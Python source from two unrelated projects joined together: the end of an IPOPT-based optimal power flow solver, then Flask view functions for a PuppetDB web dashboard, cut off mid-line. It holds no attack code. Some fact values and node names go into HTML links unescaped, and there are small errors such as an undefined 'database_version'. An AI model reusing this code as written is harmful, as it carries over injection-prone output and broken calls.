Qgen = x[Qg.i1:Qg.iN + 1] # Reactive generation in p.u. for i, g in enumerate(gn): g.p = Pgen[i] * base_mva # active generation in MW g.q = Qgen[i] * base_mva # reactive generation in MVAr # Rebuild the net complex bus power injection vector in p.u. Sbus = case.getSbus(bs) Vang = x[Va.i1:Va.iN + 1] Vmag = x[Vm.i1:Vm.iN + 1] V = Vmag * exp(1j * Vang) # Evaluate the power flow equations. mis = V * conj(Ybus * V) - Sbus # Equality constraints (power flow). g = r_[mis.real, # active power mismatch for all buses mis.imag] # reactive power mismatch for all buses # Inequality constraints (branch flow limits). # (line constraint is actually on square of limit) flow_max = array([(l.rate_a / base_mva)**2 for l in ln]) # FIXME: There must be a more elegant method for this. for i, v in enumerate(flow_max): if v == 0.0: flow_max[i] = Inf if self.flow_lim == IFLOW: If = Yf * V It = Yt * V # Branch current limits. h = r_[(If * conj(If)) - flow_max, (If * conj(It)) - flow_max] else: i_fbus = [e.from_bus._i for e in ln] i_tbus = [e.to_bus._i for e in ln] # Complex power injected at "from" bus (p.u.). Sf = V[i_fbus] * conj(Yf * V) # Complex power injected at "to" bus (p.u.). St = V[i_tbus] * conj(Yt * V) if self.flow_lim == PFLOW: # active power limit, P (Pan Wei) # Branch real power limits. h = r_[Sf.real()**2 - flow_max, St.real()**2 - flow_max] elif self.flow_lim == SFLOW: # apparent power limit, |S| # Branch apparent power limits. h = r_[(Sf * conj(Sf)) - flow_max, (St * conj(St)) - flow_max].real else: raise ValueError return r_[g, h] def dg_fcn(x, flag, usr_data=None): """ Calculates the Jacobian matrix. It takes two arguments, the first is the variable x and the second is a Boolean flag. If the flag is true, the function returns a tuple of arrays (row, col) to indicate the sparse structure of the Jacobian matrix. If the flag is false the function returns the values of the Jacobian matrix with length nnzj. """ iVa = range(Va.i1, Va.iN + 1) iVm = range(Vm.i1, Vm.iN + 1) iPg = range(Pg.i1, Pg.iN + 1) iQg = range(Qg.i1, Qg.iN + 1) iVaVmPgQg = r_[iVa, iVm, iPg, iQg].T Vang = x[Va.i1:Va.iN + 1] Vmag = x[Vm.i1:Vm.iN + 1] V = Vmag * exp(1j * Vang) # Compute partials of injected bus powers. dSbus_dVm, dSbus_dVa = case.dSbus_dV(Ybus, V) i_gbus = [gen.bus._i for gen in gn] neg_Cg = csr_matrix((-ones(ng), (i_gbus, range(ng))), (nb, ng)) # Transposed Jacobian of the power balance equality constraints. dg = lil_matrix((nxyz, 2 * nb)) blank = csr_matrix((nb, ng)) dg[iVaVmPgQg, :] = vstack([ hstack([dSbus_dVa.real, dSbus_dVm.real, neg_Cg, blank]), hstack([dSbus_dVa.imag, dSbus_dVm.imag, blank, neg_Cg]) ], "csr").T # Compute partials of flows w.r.t V. if self.flow_lim == IFLOW: dFf_dVa, dFf_dVm, dFt_dVa, dFt_dVm, Ff, Ft = \ case.dIbr_dV(Yf, Yt, V) else: dFf_dVa, dFf_dVm, dFt_dVa, dFt_dVm, Ff, Ft = \ case.dSbr_dV(Yf, Yt, V, bs, ln) if self.flow_lim == PFLOW: dFf_dVa = dFf_dVa.real dFf_dVm = dFf_dVm.real dFt_dVa = dFt_dVa.real dFt_dVm = dFt_dVm.real Ff = Ff.real Ft = Ft.real # Squared magnitude of flow (complex power, current or real power). df_dVa, df_dVm, dt_dVa, dt_dVm = \ case.dAbr_dV(dFf_dVa, dFf_dVm, dFt_dVa, dFt_dVm, Ff, Ft) # Construct Jacobian of inequality constraints (branch limits) and # transpose it. dh = lil_matrix((nxyz, 2 * nl)) dh[r_[iVa, iVm].T, :] = vstack([hstack([df_dVa, df_dVm]), hstack([dt_dVa, dt_dVm])], "csr").T J = vstack([dg, dh, A]).tocoo() if flag: return (J.row, J.col) else: return J.data def h_fcn(x, lagrange, obj_factor, flag, usr_data=None): """ Evaluates the Hessian of the Lagrangian. """ neqnln = 2 * nb niqnln = 2 * len(il) # no. of lines with constraints Pgen = x[Pg.i1:Pg.iN + 1] # Active generation in p.u. Qgen = x[Qg.i1:Qg.iN + 1] # Reactive generation in p.u. for i, g in enumerate(gn): g.p = Pgen[i] * base_mva # active generation in MW g.q = Qgen[i] * base_mva # reactive generation in MVAr Vang = x[Va.i1:Va.iN + 1] Vmag = x[Vm.i1:Vm.iN + 1] V = Vmag * exp(1j * Vang) nxtra = nxyz - 2 * nb #------------------------------------------------------------------ # Evaluate d2f. #------------------------------------------------------------------ d2f_dPg2 = lil_matrix((ng, 1)) # w.r.t p.u. Pg d2f_dQg2 = lil_matrix((ng, 1)) # w.r.t p.u. Qg] for i in ipol: d2f_dPg2[i, 0] = polyval(polyder(list(gn[i].p_cost), 2), Pg.v0[i] * base_mva) * base_mva**2 # for i in ipol: # d2f_dQg2[i] = polyval(polyder(list(gn[i].p_cost), 2), # Qg.v0[i] * base_mva) * base_mva**2 i = r_[range(Pg.i1, Pg.iN + 1), range(Qg.i1, Qg.iN + 1)] d2f = csr_matrix((vstack([d2f_dPg2, d2f_dQg2]).toarray().flatten(), (i, i)), shape=(nxyz, nxyz)) # TODO: Generalised cost model. d2f = d2f * self.opt["cost_mult"] #------------------------------------------------------------------ # Evaluate Hessian of power balance constraints. #------------------------------------------------------------------ eqnonlin = lagrange[:neqnln] # nlam = len(lagrange["eqnonlin"]) / 2 nlam = len(eqnonlin) / 2 lamP = eqnonlin[:nlam] lamQ = eqnonlin[nlam:nlam + nlam] Gpaa, Gpav, Gpva, Gpvv = case.d2Sbus_dV2(Ybus, V, lamP) Gqaa, Gqav, Gqva, Gqvv = case.d2Sbus_dV2(Ybus, V, lamQ) d2G = vstack([ hstack([ vstack([hstack([Gpaa, Gpav]), hstack([Gpva, Gpvv])]).real + vstack([hstack([Gqaa, Gqav]), hstack([Gqva, Gqvv])]).imag, csr_matrix((2 * nb, nxtra))]), hstack([ csr_matrix((nxtra, 2 * nb)), csr_matrix((nxtra, nxtra)) ]) ], "csr") #------------------------------------------------------------------ # Evaluate Hessian of flow constraints. #------------------------------------------------------------------ ineqnonlin = lagrange[neqnln:neqnln + niqnln] nmu = len(ineqnonlin) / 2 muF = ineqnonlin[:nmu] muT = ineqnonlin[nmu:nmu + nmu] if self.flow_lim == "I": dIf_dVa, dIf_dVm, dIt_dVa, dIt_dVm, If, It = \ case.dIbr_dV(Yf, Yt, V) Hfaa, Hfav, Hfva, Hfvv = \ case.d2AIbr_dV2(dIf_dVa, dIf_dVm, If, Yf, V, muF) Htaa, Htav, Htva, Htvv = \ case.d2AIbr_dV2(dIt_dVa, dIt_dVm, It, Yt, V, muT) else: f = [e.from_bus._i for e in ln] t = [e.to_bus._i for e in ln] # Line-bus connection matrices. Cf = csr_matrix((ones(nl), (range(nl), f)), (nl, nb)) Ct = csr_matrix((ones(nl), (range(nl), t)), (nl, nb)) dSf_dVa, dSf_dVm, dSt_dVa, dSt_dVm, Sf, St = \ case.dSbr_dV(Yf, Yt, V) if self.flow_lim == PFLOW: Hfaa, Hfav, Hfva, Hfvv = \ case.d2ASbr_dV2(dSf_dVa.real(), dSf_dVm.real(), Sf.real(), Cf, Yf, V, muF) Htaa, Htav, Htva, Htvv = \ case.d2ASbr_dV2(dSt_dVa.real(), dSt_dVm.real(), St.real(), Ct, Yt, V, muT) elif self.flow_lim == SFLOW: Hfaa, Hfav, Hfva, Hfvv = \ case.d2ASbr_dV2(dSf_dVa, dSf_dVm, Sf, Cf, Yf, V, muF) Htaa, Htav, Htva, Htvv = \ case.d2ASbr_dV2(dSt_dVa, dSt_dVm, St, Ct, Yt, V, muT) else: raise ValueError d2H = vstack([ hstack([ vstack([hstack([Hfaa, Hfav]), hstack([Hfva, Hfvv])]) + vstack([hstack([Htaa, Htav]), hstack([Htva, Htvv])]), csr_matrix((2 * nb, nxtra)) ]), hstack([ csr_matrix((nxtra, 2 * nb)), csr_matrix((nxtra, nxtra)) ]) ], "csr") H = d2f + d2G + d2H if flag: return (H.row, H.col) else: return H.data n = len(x0) # the number of variables gl = r_[zeros(2 * nb), -Inf * ones(2 * nl2), l] gu = r_[zeros(2 * nb), zeros(2 * nl2), u] m = len(gl) # the number of constraints nnzj = 0 # the number of nonzeros in Jacobian matrix nnzh = 0 # the number of non-zeros in Hessian matrix nlp = pyipopt.create(n, xmin, xmax, m, gl, gu, nnzj, nnzh, f_fcn, df_fcn, g_fcn, dg_fcn, h_fcn) # x, zl, zu, obj = nlp.solve(x0) success = nlp.solve(x0) nlp.close() print "Success:", success print "Solution of the primal variables, x" # print x print "Solution of the bound multipliers, z_L and z_U" # print zl, zu print "Objective value" # print "f(x*) =", obj if __name__ == "__main__": import os import pylon c = pylon.Case.load(os.path.join(os.path.dirname(pylon.__file__), "test", "data", "case6ww.pkl")) s = pylon.OPF(c, dc=False).solve(IPOPFSolver) # EOF -------------------------------------------------------------------------
from __future__ import absolute_import from __future__ import unicode_literals # load python 3, fallback to python 2 if it fails try: from urllib.parse import unquote, unquote_plus, quote_plus except ImportError: from urllib import unquote, unquote_plus, quote_plus # type: ignore from datetime import datetime, timedelta from itertools import tee import sys from flask import ( render_template, abort, url_for, Response, stream_with_context, request, session, jsonify ) import logging from pypuppetdb.QueryBuilder import (ExtractOperator, AndOperator, EqualsOperator, FunctionOperator, NullOperator, OrOperator, LessEqualOperator, RegexOperator) from puppetboard.forms import ENABLED_QUERY_ENDPOINTS, QueryForm from puppetboard.utils import (get_or_abort, yield_or_stop, get_db_version) from puppetboard.dailychart import get_daily_reports_chart try: import CommonMark as commonmark except ImportError: import commonmark from puppetboard.core import get_app, get_puppetdb, environments from . import __version__ REPORTS_COLUMNS = [ {'attr': 'end', 'filter': 'end_time', 'name': 'End time', 'type': 'datetime'}, {'attr': 'status', 'name': 'Status', 'type': 'status'}, {'attr': 'certname', 'name': 'Certname', 'type': 'node'}, {'attr': 'version', 'filter': 'configuration_version', 'name': 'Configuration version'}, {'attr': 'agent_version', 'filter': 'puppet_version', 'name': 'Agent version'}, ] CATALOGS_COLUMNS = [ {'attr': 'certname', 'name': 'Certname', 'type': 'node'}, {'attr': 'catalog_timestamp', 'name': 'Compile Time'}, {'attr': 'form', 'name': 'Compare'}, ] app = get_app() graph_facts = app.config['GRAPH_FACTS'] hide_facts = app.config['HIDE_FACTS_PREFIXES'] numeric_level = getattr(logging, app.config['LOGLEVEL'].upper(), None) logging.basicConfig(level=numeric_level) log = logging.getLogger(__name__) puppetdb = get_puppetdb() @app.template_global() def version(): return __version__ def stream_template(template_name, **context): app.update_template_context(context) t = app.jinja_env.get_template(template_name) rv = t.stream(context) rv.enable_buffering(5) return rv def check_env(env, envs): if env != '*' and env not in envs: abort(404) def metric_params(db_version): query_type = '' # Puppet Server is enforcing new metrics API (v2) # starting with versions 6.9.1, 5.3.12, and 5.2.13 if (db_version > (6, 9, 0) or (db_version > (5, 3, 11) and db_version < (6, 0, 0)) or (db_version > (5, 2, 12) and db_version < (5, 3, 10))): metric_version = 'v2' else: metric_version = 'v1' # Puppet DB version changed the query format from 3.2.0 # to 4.0 when querying mbeans if db_version < (4, 0, 0): query_type = 'type=default,' return query_type, metric_version @app.context_processor def utility_processor(): def now(format='%m/%d/%Y %H:%M:%S'): """returns the formated datetime""" return datetime.now().strftime(format) return dict(now=now) @app.route('/', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/') def index(env): """This view generates the index page and displays a set of metrics and latest reports on nodes fetched from PuppetDB. :param env: Search for nodes in this (Catalog and Fact) environment :type env: :obj:`string` """ envs = environments() metrics = { 'num_nodes': 0, 'num_resources': 0, 'avg_resources_node': 0} check_env(env, envs) if env == '*': query = app.config['OVERVIEW_FILTER'] prefix = 'puppetlabs.puppetdb.population' db_version = get_db_version(puppetdb) query_type, metric_version = metric_params(db_version) num_nodes = get_or_abort( puppetdb.metric, "{0}{1}".format(prefix, ':%sname=num-nodes' % query_type), version=metric_version) num_resources = get_or_abort( puppetdb.metric, "{0}{1}".format(prefix, ':%sname=num-resources' % query_type), version=metric_version) avg_resources_node = get_or_abort( puppetdb.metric, "{0}{1}".format(prefix, ':%sname=avg-resources-per-node' % query_type), version=metric_version) metrics['num_nodes'] = num_nodes['Value'] metrics['num_resources'] = num_resources['Value'] try: # Compute our own average because avg_resources_node['Value'] # returns a string of the format "num_resources/num_nodes" # example: "1234/9" instead of doing the division itself. metrics['avg_resources_node'] = "{0:10.0f}".format( (num_resources['Value'] / num_nodes['Value'])) except ZeroDivisionError: metrics['avg_resources_node'] = 0 else: query = AndOperator() query.add(EqualsOperator('catalog_environment', env)) num_nodes_query = ExtractOperator() num_nodes_query.add_field(FunctionOperator('count')) num_nodes_query.add_query(query) if app.config['OVERVIEW_FILTER'] is not None: query.add(app.config['OVERVIEW_FILTER']) num_resources_query = ExtractOperator() num_resources_query.add_field(FunctionOperator('count')) num_resources_query.add_query(EqualsOperator("environment", env)) num_nodes = get_or_abort( puppetdb._query, 'nodes', query=num_nodes_query) num_resources = get_or_abort( puppetdb._query, 'resources', query=num_resources_query) metrics['num_nodes'] = num_nodes[0]['count'] metrics['num_resources'] = num_resources[0]['count'] try: metrics['avg_resources_node'] = "{0:10.0f}".format( (num_resources[0]['count'] / num_nodes[0]['count'])) except ZeroDivisionError: metrics['avg_resources_node'] = 0 nodes = get_or_abort(puppetdb.nodes, query=query, unreported=app.config['UNRESPONSIVE_HOURS'], with_status=True, with_event_numbers=app.config['WITH_EVENT_NUMBERS']) nodes_overview = [] stats = { 'changed': 0, 'unchanged': 0, 'failed': 0, 'unreported': 0, 'noop': 0 } for node in nodes: if node.status == 'unreported': stats['unreported'] += 1 elif node.status == 'changed': stats['changed'] += 1 elif node.status == 'failed': stats['failed'] += 1 elif node.status == 'noop': stats['noop'] += 1 else: stats['unchanged'] += 1 if node.status != 'unchanged': nodes_overview.append(node) return render_template( 'index.html', metrics=metrics, nodes=nodes_overview, stats=stats, envs=envs, current_env=env ) @app.route('/nodes', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/nodes') def nodes(env): """Fetch all (active) nodes from PuppetDB and stream a table displaying those nodes. Downside of the streaming aproach is that since we've already sent our headers we can't abort the request if we detect an error. Because of this we'll end up with an empty table instead because of how yield_or_stop works. Once pagination is in place we can change this but we'll need to provide a search feature instead. :param env: Search for nodes in this (Catalog and Fact) environment :type env: :obj:`string` """ envs = environments() status_arg = request.args.get('status', '') check_env(env, envs) query = AndOperator() if env != '*': query.add(EqualsOperator("catalog_environment", env)) if status_arg in ['failed', 'changed', 'unchanged']: query.add(EqualsOperator('latest_report_status', status_arg)) elif status_arg == 'unreported': unreported = datetime.utcnow() unreported = (unreported - timedelta(hours=app.config['UNRESPONSIVE_HOURS'])) unreported = unreported.replace(microsecond=0).isoformat() unrep_query = OrOperator() unrep_query.add(NullOperator('report_timestamp', True)) unrep_query.add(LessEqualOperator('report_timestamp', unreported)) query.add(unrep_query) if len(query.operations) == 0: query = None nodelist = puppetdb.nodes( query=query, unreported=app.config['UNRESPONSIVE_HOURS'], with_status=True, with_event_numbers=app.config['WITH_EVENT_NUMBERS']) nodes = [] for node in yield_or_stop(nodelist): if status_arg: if node.status == status_arg: nodes.append(node) else: nodes.append(node) return Response(stream_with_context( stream_template('nodes.html', nodes=nodes, envs=envs, current_env=env))) def inventory_facts(): # a list of facts descriptions to go in table header headers = [] # a list of inventory fact names fact_names = [] # load the list of items/facts we want in our inventory try: inv_facts = app.config['INVENTORY_FACTS'] except KeyError: inv_facts = [('Hostname', 'fqdn'), ('IP Address', 'ipaddress'), ('OS', 'lsbdistdescription'), ('Architecture', 'hardwaremodel'), ('Kernel Version', 'kernelrelease')] # generate a list of descriptions and a list of fact names # from the list of tuples inv_facts. for desc, name in inv_facts: headers.append(desc) fact_names.append(name) return headers, fact_names @app.route('/inventory', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/inventory') def inventory(env): """Fetch all (active) nodes from PuppetDB and stream a table displaying those nodes along with a set of facts about them. :param env: Search for facts in this environment :type env: :obj:`string` """ envs = environments() check_env(env, envs) headers, fact_names = inventory_facts() return render_template( 'inventory.html', envs=envs, current_env=env, fact_headers=headers) @app.route('/inventory/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/inventory/json') def inventory_ajax(env): """Backend endpoint for inventory table""" draw = int(request.args.get('draw', 0)) envs = environments() check_env(env, envs) headers, fact_names = inventory_facts() query = AndOperator() fact_query = OrOperator() fact_query.add([EqualsOperator("name", name) for name in fact_names]) query.add(fact_query) if env != '*': query.add(EqualsOperator("environment", env)) facts = puppetdb.facts(query=query) fact_data = {} for fact in facts: skip = False for i in hide_facts: if fact.name.startswith(i): skip = True break if skip: continue if fact.node not in fact_data: fact_data[fact.node] = {} fact_data[fact.node][fact.name] = fact.value total = len(fact_data) return render_template( 'inventory.json.tpl', draw=draw, total=total, total_filtered=total, fact_data=fact_data, columns=fact_names) @app.route('/node/<node_name>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/node/<node_name>') def node(env, node_name): """Display a dashboard for a node showing as much data as we have on that node. This includes facts and reports but not Resources as that is too heavy to do within a single request. :param env: Ensure that the node, facts and reports are in this environment :type env: :obj:`string` """ envs = environments() check_env(env, envs) query = AndOperator() if env != '*': query.add(EqualsOperator("environment", env)) query.add(EqualsOperator("certname", node_name)) node = get_or_abort(puppetdb.node, node_name) return render_template( 'node.html', node=node, envs=envs, current_env=env, columns=REPORTS_COLUMNS[:2]) @app.route('/reports', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node_name': None}) @app.route('/<env>/reports', defaults={'node_name': None}) @app.route('/reports/<node_name>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/reports/<node_name>') def reports(env, node_name): """Query and Return JSON data to reports Jquery datatable :param env: Search for all reports in this environment :type env: :obj:`string` """ envs = environments() check_env(env, envs) return render_template( 'reports.html', envs=envs, current_env=env, node_name=node_name, columns=REPORTS_COLUMNS) @app.route('/reports/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node_name': None}) @app.route('/<env>/reports/json', defaults={'node_name': None}) @app.route('/reports/<node_name>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/reports/<node_name>/json') def reports_ajax(env, node_name): """Query and Return JSON data to reports Jquery datatable :param env: Search for all reports in this environment :type env: :obj:`string` """ draw = int(request.args.get('draw', 0)) start = int(request.args.get('start', 0)) length = int(request.args.get('length', app.config['NORMAL_TABLE_COUNT'])) paging_args = {'limit': length, 'offset': start} search_arg = request.args.get('search[value]') order_column = int(request.args.get('order[0][column]', 0)) order_filter = REPORTS_COLUMNS[order_column].get( 'filter', REPORTS_COLUMNS[order_column]['attr']) order_dir = request.args.get('order[0][dir]', 'desc') order_args = '[{"field": "%s", "order": "%s"}]' % (order_filter, order_dir) status_args = request.args.get('columns[1][search][value]', '').split('|') max_col = len(REPORTS_COLUMNS) for i in range(len(REPORTS_COLUMNS)): if request.args.get("columns[%s][data]" % i, None): max_col = i + 1 envs = environments() check_env(env, envs) reports_query = AndOperator() if env != '*': reports_query.add(EqualsOperator("environment", env)) if node_name: reports_query.add(EqualsOperator("certname", node_name)) if search_arg: search_query = OrOperator() search_query.add(RegexOperator("certname", r"%s" % search_arg)) search_query.add(RegexOperator("puppet_version", r"%s" % search_arg)) search_query.add(RegexOperator( "configuration_version", r"%s" % search_arg)) reports_query.add(search_query) status_query = OrOperator() for status_arg in status_args: if status_arg in ['failed', 'changed', 'unchanged']: arg_query = AndOperator() arg_query.add(EqualsOperator('status', status_arg)) arg_query.add(EqualsOperator('noop', False)) status_query.add(arg_query) if status_arg == 'unchanged': arg_query = AndOperator() arg_query.add(EqualsOperator('noop', True)) arg_query.add(EqualsOperator('noop_pending', False)) status_query.add(arg_query) elif status_arg == 'noop': arg_query = AndOperator() arg_query.add(EqualsOperator('noop', True)) arg_query.add(EqualsOperator('noop_pending', True)) status_query.add(arg_query) if len(status_query.operations) == 0: if len(reports_query.operations) == 0: reports_query = None else: reports_query.add(status_query) if status_args[0] != 'none': reports = get_or_abort( puppetdb.reports, query=reports_query, order_by=order_args, include_total=True, **paging_args) reports, reports_events = tee(reports) total = None else: reports = [] reports_events = [] total = 0 # Convert metrics to relational dict metrics = {} for report in reports_events: if total is None: total = puppetdb.total metrics[report.hash_] = {} for m in report.metrics: if m['category'] not in metrics[report.hash_]: metrics[report.hash_][m['category']] = {} metrics[report.hash_][m['category']][m['name']] = m['value'] if total is None: total = 0 return render_template( 'reports.json.tpl', draw=draw, total=total, total_filtered=total, reports=reports, metrics=metrics, envs=envs, current_env=env, columns=REPORTS_COLUMNS[:max_col]) @app.route('/report/<node_name>/<report_id>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/report/<node_name>/<report_id>') def report(env, node_name, report_id): """Displays a single report including all the events associated with that report and their status. The report_id may be the puppetdb's report hash or the configuration_version. This allows for better integration into puppet-hipchat. :param env: Search for reports in this environment :type env: :obj:`string` :param node_name: Find the reports whose certname match this value :type node_name: :obj:`string` :param report_id: The hash or the configuration_version of the desired report :type report_id: :obj:`string` """ envs = environments() check_env(env, envs) query = AndOperator() report_id_query = OrOperator() report_id_query.add(EqualsOperator("hash", report_id)) report_id_query.add(EqualsOperator("configuration_version", report_id)) if env != '*': query.add(EqualsOperator("environment", env)) query.add(EqualsOperator("certname", node_name)) query.add(report_id_query) reports = puppetdb.reports(query=query) try: report = next(reports) except StopIteration: abort(404) report.version = commonmark.commonmark(report.version) return render_template( 'report.html', report=report, events=yield_or_stop(report.events()), logs=report.logs, metrics=report.metrics, envs=envs, current_env=env) @app.route('/facts', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/facts') def facts(env): """Displays an alphabetical list of all facts currently known to PuppetDB. :param env: Serves no purpose for this function, only for consistency's sake :type env: :obj:`string` """ envs = environments() check_env(env, envs) facts = [] order_by = '[{"field": "name", "order": "asc"}]' facts = get_or_abort(puppetdb.fact_names) facts_columns = [[]] letter = None letter_list = None break_size = (len(facts) / 4) + 1 next_break = break_size count = 0 for fact in facts: skip = False for i in hide_facts: if fact.startswith(i): skip = True break if skip: continue count += 1 if letter != fact[0].upper() or not letter: if count > next_break: # Create a new column facts_columns.append([]) next_break += break_size if letter_list: facts_columns[-1].append(letter_list) # Reset letter = fact[0].upper() letter_list = [] letter_list.append(fact) facts_columns[-1].append(letter_list) return render_template('facts.html', facts_columns=facts_columns, envs=envs, current_env=env) @app.route('/fact/<fact>', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'value': None}) @app.route('/<env>/fact/<fact>', defaults={'value': None}) @app.route('/fact/<fact>/<value>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/fact/<fact>/<value>') def fact(env, fact, value): """Fetches the specific fact(/value) from PuppetDB and displays per node for which this fact is known. :param env: Searches for facts in this environment :type env: :obj:`string` :param fact: Find all facts with this name :type fact: :obj:`string` :param value: Find all facts with this value :type value: :obj:`string` """ envs = environments() check_env(env, envs) render_graph = False if fact in graph_facts and not value: render_graph = True value_safe = value if value is not None: value_safe = unquote_plus(value) return render_template( 'fact.html', fact=fact, value=value, value_safe=value_safe, render_graph=render_graph, envs=envs, current_env=env) @app.route('/fact/<fact>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node': None, 'value': None}) @app.route('/<env>/fact/<fact>/json', defaults={'node': None, 'value': None}) @app.route('/fact/<fact>/<value>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node': None}) @app.route('/fact/<fact>/<path:value>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node': None}) @app.route('/<env>/fact/<fact>/<value>/json', defaults={'node': None}) @app.route('/node/<node>/facts/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'fact': None, 'value': None}) @app.route('/<env>/node/<node>/facts/json', defaults={'fact': None, 'value': None}) def fact_ajax(env, node, fact, value): """Fetches the specific facts matching (node/fact/value) from PuppetDB and return a JSON table :param env: Searches for facts in this environment :type env: :obj:`string` :param node: Find all facts for this node :type node: :obj:`string` :param fact: Find all facts with this name :type fact: :obj:`string` :param value: Filter facts whose value is equal to this :type value: :obj:`string` """ draw = int(request.args.get('draw', 0)) envs = environments() check_env(env, envs) render_graph = False if fact in graph_facts and not value and not node: render_graph = True query = AndOperator() if node: query.add(EqualsOperator("certname", node)) if env != '*': query.add(EqualsOperator("environment", env)) if len(query.operations) == 0: query = None # Generator needs to be converted (graph / total) try: value = int(value) except ValueError: if value is not None and query is not None: query.add(EqualsOperator('value', unquote_plus(value))) except TypeError: pass facts = [f for f in get_or_abort( puppetdb.facts, name=fact, query=query)] total = len(facts) counts = {} json = { 'draw': draw, 'recordsTotal': total, 'recordsFiltered': total, 'data': []} for fact_h in facts: skip = False for i in hide_facts: if fact_h.name.startswith(i): skip = True break if skip: continue line = [] if not fact: line.append(fact_h.name) if not node: line.append('<a href="{0}">{1}</a>'.format( url_for('node', env=env, node_name=fact_h.node), fact_h.node)) if not value: fact_value = fact_h.value if isinstance(fact_value, str): fact_value = quote_plus(fact_h.value) line.append('<a href="{0}">{1}</a>'.format( url_for( 'fact', env=env, fact=fact_h.name, value=fact_value), fact_h.value)) json['data'].append(line) if render_graph: if fact_h.value not in counts: counts[fact_h.value] = 0 counts[fact_h.value] += 1 if render_graph: json['chart'] = [ {"label": "{0}".format(k).replace('\n', ' '), "value": counts[k]} for k in sorted(counts, key=lambda k: counts[k], reverse=True)] return jsonify(json) @app.route('/query', methods=('GET', 'POST'), defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/query', methods=('GET', 'POST')) def query(env): """Allows to execute raw, user created querries against PuppetDB. This is currently highly experimental and explodes in interesting ways since none of the possible exceptions are being handled just yet. This will return the JSON of the response or a message telling you what whent wrong / why nothing was returned. :param env: Serves no purpose for the query data but is required for the select field in the environment block :type env: :obj:`string` """ if not app.config['ENABLE_QUERY']: log.warn('Access to query interface disabled by administrator.') abort(403) envs = environments() check_env(env, envs) form = QueryForm(meta={ 'csrf_secret': app.config['SECRET_KEY'], 'csrf_context': session}) if form.validate_on_submit(): if form.endpoints.data not in ENABLED_QUERY_ENDPOINTS: log.warn('Access to query endpoint %s disabled by administrator.', form.endpoints.data) abort(403) if form.endpoints.data == 'pql': query = form.query.data elif form.query.data[0] == '[': query = form.query.data else: query = '[{0}]'.format(form.query.data) result = get_or_abort( puppetdb._query, form.endpoints.data, query=query) return render_template('query.html', form=form, result=result, envs=envs, current_env=env) return render_template('query.html', form=form, envs=envs, current_env=env) @app.route('/metrics', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/metrics') def metrics(env): """Lists all available metrics that PuppetDB is aware of. :param env: While this parameter serves no function purpose it is required for the environments template block :type env: :obj:`string` """ envs = environments() check_env(env, envs) db_version = get_db_version(puppetdb) query_type, metric_version = metric_params(db_version) if metric_version == 'v1': mbeans = get_or_abort(puppetdb._query, 'mbean') metrics = list(mbeans.keys()) elif metric_version == 'v2': # the list response is a dict in the format: # { # "domain1": { # "property1": { # ... # } # }, # "domain2": { # "property2": { # ... # } # } # } # The MBean names are the combination of the domain and the properties # with a ":" in between, example: # domain1:property1 # domain2:property2 # reference: https://jolokia.org/reference/html/protocol.html#list metrics_domains = get_or_abort(puppetdb.metric) metrics = [] # get all of the domains for domain in list(metrics_domains.keys()): # iterate over all of the properties in this domain properties = list(metrics_domains[domain].keys()) for prop in properties: # combine the current domain and each property with # a ":" in between metrics.append(domain + ':' + prop) else: raise ValueError("Unknown metric version {} for database version {}" .format(metric_version, database_version)) return render_template('metrics.html', metrics=sorted(metrics), envs=envs, current_env=env) @app.route('/metric/<path:metric>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/metric/<path:metric>') def metric(env, metric): """Lists all information about the metric of the given name. :param env: While this parameter serves no function purpose it is required for the environments template block :type env: :obj:`string` """ envs = environments() check_env(env, envs) db_version = get_db_version(puppetdb) query_type, metric_version = metric_params(db_version) name = unquote(metric) metric = get_or_abort(puppetdb.metric, metric, version=metric_version) return render_template( 'metric.html', name=name, metric=sorted(metric.items()), envs=envs, current_env=env) @app.route('/catalogs', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'compare': None}) @app.route('/<env>/catalogs', defaults={'compare': None}) @app.route('/catalogs/compare/<compare>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/catalogs/compare/<compare>') def catalogs(env, compare): """Lists all nodes with a compiled catalog. :param env: Find the nodes with this catalog_environment value :type env: :obj:`string` """ envs = environments() check_env(env, envs) if not app.config['ENABLE_CATALOG']: log.warning('Access to catalog interface disabled by administrator') abort(403) return render_template( 'catalogs.html', compare=compare, columns=CATALOGS_COLUMNS, envs=envs, current_env=env) @app.route('/catalogs/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'compare': None}) @app.route('/<env>/catalogs/json', defaults={'compare': None}) @app.route('/catalogs/compare/<compare>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/catalogs/compare/<compare>/json') def catalogs_ajax(env, compare): """Server data to catalogs as JSON to Jquery datatables """ draw = int(request.args.get('draw', 0)) start = int(request.args.get('start', 0)) length = int(request.args.get('length', app.config['NORMAL_TABLE_COUNT'])) paging_args = {'limit': length, 'offset': start} search_arg = request.args.get('search[value]') order_column = int(request.args.get('order[0][column]', 0)) order_filter = CATALOGS_COLUMNS[order_column].get( 'filter', CATALOGS_COLUMNS[order_column]['attr']) order_dir = request.args.get('order[0][dir]', 'asc') order_args = '[{"field": "%s", "order": "%s"}]' % (order_filter, order_dir) envs = environments() check_env(env, envs) query = AndOperator() if env != 